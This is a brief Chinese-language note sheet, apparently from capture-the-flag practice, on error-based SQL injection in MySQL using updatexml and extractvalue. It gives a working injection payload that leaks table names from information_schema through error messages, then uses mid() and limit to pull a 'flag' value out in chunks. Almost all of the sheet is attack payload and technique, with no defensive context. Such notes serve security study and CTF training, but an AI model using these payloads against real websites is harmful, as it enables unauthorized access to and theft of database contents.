报错注入
updatexml(1,欲查询代码,1)
参数一:String,为XML对象
参数二:XML语句
参数三:查找到后欲替换的数据
extractvalue(1,欲查询代码)
参数一:String,为XML文档对象
参数二:XML语句
错误的xml语句会抛出错误,可以看到我们的查询语句
or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1),'2')#
适当修改查询语句即可
报错语句过长,显示不全
select mid(flag,1,16) from flag
select mid(flag,17,16) from flag
多条数据用limit
select flag from flag limit 0,1
select flag from flag limit 0,2
group_concat不能同时配合limit使用